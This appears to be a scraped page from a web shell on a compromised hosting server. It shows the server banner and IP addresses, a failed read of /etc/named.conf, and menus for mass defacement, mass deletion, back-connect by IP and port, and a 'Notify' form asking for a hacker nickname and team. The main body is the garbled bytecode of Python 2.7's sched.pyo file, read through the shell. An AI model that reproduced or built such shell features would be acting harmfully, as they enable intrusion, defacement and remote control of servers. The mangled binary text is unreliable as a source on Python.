Linux premium216.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
66.29.141.148 | Your IP: 3.145.61.199
Cant read [ /etc/named.conf ]
[
drwxr-xr-x
]
/
lib64
/
python2.7
/
Submit
Home
Upload
Mass Deface
Mass Delete
Back Connect
Notify
File Uploader
Upload
File Name
File Content
Create
Folder Name
Create
Directory
File Name
File Content
Submit
Directory
File Name
Submit
Ip
Port
Submit
Nickname
Team
Website
Submit
sched.pyo
� zfc @ sQ d Z d d l Z d d l m Z d g Z e d d � Z d d d � � YZ d S( s� A generally useful event scheduler class. Each instance of this class manages its own queue. No multi-threading is implied; you are supposed to hack that yourself, or use a single instance per application. Each instance is parametrized with two functions, one that is supposed to return the current time, one that is supposed to implement a delay. You can implement real-time scheduling by substituting time and sleep from built-in module time, or you can implement simulated time by writing your own functions. This can also be used to integrate scheduling with STDWIN events; the delay function is allowed to modify the queue. Time can be expressed as integers or floating point numbers, as long as it is consistent. Events are specified by tuples (time, priority, action, argument). As in UNIX, lower priority numbers mean higher priority; in this way the queue can be maintained as a priority queue. Execution of the event means calling the action function, passing it the argument sequence in "argument" (remember that in Python, multiple function arguments are be packed in a sequence). The action function may be an instance method so it has another way to reference private data (besides global variables). i����N( t namedtuplet schedulert Events time, priority, action, argumentc B sM e Z d � Z d � Z d � Z d � Z d � Z d � Z e d � � Z RS( c C s g | _ | | _ | | _ d S( sG Initialize a new instance, passing the time and delay functionsN( t _queuet timefunct delayfunc( t selfR R ( ( s /usr/lib64/python2.7/sched.pyt __init__'